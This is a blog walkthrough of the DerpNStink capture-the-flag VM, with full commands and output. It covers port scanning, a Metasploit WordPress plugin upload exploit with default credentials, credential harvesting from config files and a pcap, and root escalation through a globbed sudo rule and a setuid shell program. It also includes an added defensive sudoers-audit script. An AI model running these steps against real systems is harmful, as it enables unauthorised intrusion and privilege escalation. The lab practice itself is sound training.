VM - Cracking DerpNStink

Posted by 青蛙愛輪滑 on 2019-02-18

This post records my penetration-testing learning process against Lazysysadmin; the test VM comes from www.vulnhub.com
Blog series: CTF-oriented VM cracking series
Download link: DerpNStink

  1. The IP of a freshly installed VM is unknown, so the first step is information gathering to discover it; netdiscover is used here

    Currently scanning: 192.168.141.0/16   |   Screen View: Unique Hosts                                                   
                                                                                                                            
     4 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 240                                                        
     _____________________________________________________________________________
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
     -----------------------------------------------------------------------------
     10.10.10.2      00:50:56:fb:16:b2      2     120  VMware, Inc.                                                         
     10.10.10.128    00:0c:29:48:44:79      2     120  VMware, Inc. 
    
  2. Probe the open ports with nmap

    Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 02:47 EST
    Nmap scan report for 10.10.10.128
    Host is up (0.00041s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.2
    22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
    |   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
    |   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
    |_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    | http-robots.txt: 2 disallowed entries
    |_/php/ /temporary/
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: DeRPnStiNK
    MAC Address: 00:0C:29:48:44:79 (VMware)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
  3. The nmap scan shows that port 80 is open on the target. Browsing to the home page and viewing the page source reveals flag1
    flag1: FLAG1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

  4. Next, brute-force directories with dirbuster

  5. The brute force finds a weblog directory that can be accessed; it is a WordPress site

  6. Use wpscan to enumerate the WordPress themes, users and plugins

    root@kali:~# wpscan --enumerate at --enumerate ap --enumerate u --url http://10.10.10.128
    

    wpscan shows us an exploitable plugin

    We also find that the username and password are both admin

  7. We use Metasploit to exploit this vulnerability

    msf > use exploit/unix/webapp/wp_slideshowgallery_upload
    msf exploit(unix/webapp/wp_slideshowgallery_upload) > set rhost 192.168.1.102
    msf exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog
    msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
    msf exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
    msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
    

    Shell obtained successfully
    Enter the web root and read the database username and password from wp-config.php

    meterpreter > pwd
    /var/www/html/weblog
    meterpreter > cat wp-config.php
    
    	/** MySQL database username */
    	define('DB_USER', 'root');
    	
    	/** MySQL database password */
    	define('DB_PASSWORD', 'mysql');
    
  8. Since dirbuster earlier found the phpmyadmin directory, connecting to it remotely in the browser shows another WordPress account and its password hash
    Use John the Ripper to brute-force the password hash
    The cracked password is wedgie57

  9. Log in to WordPress with the cracked username/password: unclestinky/wedgie57
    The flag2 obtained is flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

  10. Check the list of users under /home
    Trying to log in as stinky over ssh shows that only key-based login is allowed

  11. In the meterpreter session from before, get a shell and try logging in as stinky/wedgie57

    meterpreter > shell
    Process 2685 created.
    Channel 2 created.
    python -c 'import pty;pty.spawn("/bin/sh")'
    $ su stinky
    su stinky
    Password: wedgie57
    
    stinky@DeRPnStiNK:/home$ ls
    ls
    mrderp  stinky
    stinky@DeRPnStiNK:/home$
    stinky@DeRPnStiNK:/home$ ls
    ls
    mrderp  stinky
    stinky@DeRPnStiNK:/home$ cd stinky
    cd stinky
    stinky@DeRPnStiNK:~$ ls
    ls
    Desktop  Documents  Downloads  ftp
    stinky@DeRPnStiNK:~$ cd Desktop
    cd Desktop
    stinky@DeRPnStiNK:~/Desktop$ ls
    ls
    flag.txt
    stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
    cat flag.txt
    flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
    
    

After logging in successfully, enumerating the system reveals the flag.txt file. flag3: flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

  1. Enumerating the system, a derpissues.pcap file is found in the Documents directory

    stinky@DeRPnStiNK:~$ cd Documents
    cd Documents
    stinky@DeRPnStiNK:~/Documents$ ls
    ls
    derpissues.pcap
    
  2. Log in to the system over ftp as stinky/wedgie57 to download the pcap
    The ftp root directory turns out to be files, so change the shell's working directory to files

    stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
    cat derpissues.txt
    12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
    12:07 stinky: yeah. did you need a password reset?
    12:07 mrderp: I think i accidently deleted my account
    12:07 mrderp: i just need to logon once to make a change
    12:07 stinky: im gonna packet capture so we can figure out whats going on
    12:07 mrderp: that seems a bit overkill, but wtv
    12:08 stinky: commence the sniffer!!!!
    12:08 mrderp: -_-
    12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
    12:11 mrderp: awesome it works!
    12:12 stinky: we really are the best sysadmins #team
    12:13 mrderp: i guess we are...
    12:15 mrderp: alright I made the changes, feel free to decomission my account
    12:20 stinky: done! yay
    
  3. Copy derpissues.pcap to the ftp root directory so that it can be downloaded

    stinky@DeRPnStiNK:~/Documents$ cp derpissues.pcap /home/stinky/ftp/files
    cp derpissues.pcap /home/stinky/ftp/files
    

    Download the pcap
    Open it in Wireshark and find the other user's password
    The other account's username and password are: mrderp / derpderpderpderpderpderpderp

  4. Connect as mrderp over ssh
    After logging in, enumerating the system reveals a hint
    Then check what sudo allows

    mrderp@DeRPnStiNK:~$ ls
    Desktop  Documents  Downloads
    mrderp@DeRPnStiNK:~$ sudo -l
    [sudo] password for mrderp: 
    Matching Defaults entries for mrderp on DeRPnStiNK:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
    
    User mrderp may run the following commands on DeRPnStiNK:
        (ALL) /home/mrderp/binaries/derpy*
    

    From the rule /home/mrderp/binaries/derpy* above: any executable in the binaries directory whose name begins with derpy may be run as root. Create such a file to escalate privileges

    mrderp@DeRPnStiNK:~$ mkdir binaries
    mrderp@DeRPnStiNK:~$ ls
    binaries  Desktop  Documents  Downloads
    mrderp@DeRPnStiNK:~$ cd binaries/
    mrderp@DeRPnStiNK:~/binaries$ cat derpy.c 
    	#include<stdio.h>
    	#include<stdlib.h>
    	#include<sys/types.h>
    	#include<unistd.h>
    	int main()
    	{
    		setuid(0);
    		system("/bin/bash");
    		return 0;
    	}
    mrderp@DeRPnStiNK:~/binaries$ gcc derpy.c -o derpy
    mrderp@DeRPnStiNK:~/binaries$ ls
    derpy  derpy.c  derpy.py  derpy.sh
    mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy 
    [sudo] password for mrderp: 
    root@DeRPnStiNK:~/binaries# id
    uid=0(root) gid=0(root) groups=0(root)
    

    Alternatively, use the following method:

    mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh 
    	#!/bin/bash
    	bash -i
    mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh 
    mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh 
    root@DeRPnStiNK:~/binaries# 
    
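    The root cause of both escalations above is the sudoers rule itself: a glob in the command spec, under a directory the rule's own user can write to. The following Python is an added defensive example, not part of the original walkthrough, that audits sudoers lines for that pattern; the sample lines are constructed, with the mrderp line mirroring the VM's rule.

```python
"""Audit sudoers rules for command specs a user can turn into arbitrary code.

Added example, not from the DerpNStink walkthrough. It flags rules whose
command path contains a glob (derpy* matches anything the user names that
way) or lives in a directory the rule's own user can write to. The lines
below are constructed samples; the mrderp line mirrors the VM's rule.
"""
import re

SUDOERS_LINES = [
    "Defaults env_reset, mail_badpass",
    "root    ALL=(ALL:ALL) ALL",
    "mrderp  ALL=(ALL) /home/mrderp/binaries/derpy*",   # the DerpNStink rule
    "backup  ALL=(root) NOPASSWD: /usr/bin/rsync",       # fixed, root-owned path
    "deploy  ALL=(ALL) /usr/local/bin/deploy-*.sh",      # glob, but system dir
]

# user  host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
USER_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def audit_rule(line):
    """Return findings (strings) for one sudoers line; [] if it looks safe."""
    line = line.strip()
    if not line or line.startswith(("#", "Defaults")):
        return []
    m = RULE_RE.match(line)
    if not m:
        return []
    user, findings = m.group("user"), []
    for cmd in m.group("cmds").split(","):
        cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd.strip())  # drop NOPASSWD: etc.
        path = cmd.split()[0] if cmd else ""
        if path == "ALL":
            continue  # full sudo is a policy decision, not a misconfiguration
        if any(ch in path for ch in "*?["):
            findings.append(f"{user}: glob in command spec '{path}'")
        if path.startswith(f"/home/{user}/") or path.startswith(USER_WRITABLE):
            findings.append(f"{user}: command under user-writable path '{path}'")
    return findings


def audit_sudoers(lines):
    """Audit every line; returns the combined list of findings."""
    return [f for line in lines for f in audit_rule(line)]


if __name__ == "__main__":
    for finding in audit_sudoers(SUDOERS_LINES):
        print(finding)
```

    The fix the audit points at is a fixed path to a root-owned binary outside the user's home, e.g. /usr/local/bin/derpy, with no glob.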

    Get flag4:

    root@DeRPnStiNK:~/binaries# cd /root/Desktop/
    root@DeRPnStiNK:/root/Desktop# ls
    flag.txt
    root@DeRPnStiNK:/root/Desktop# cat flag.txt 
    flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
    Congrats on rooting my first VulnOS!
    Hit me up on twitter and let me know your thoughts!
    @securekomodo
    
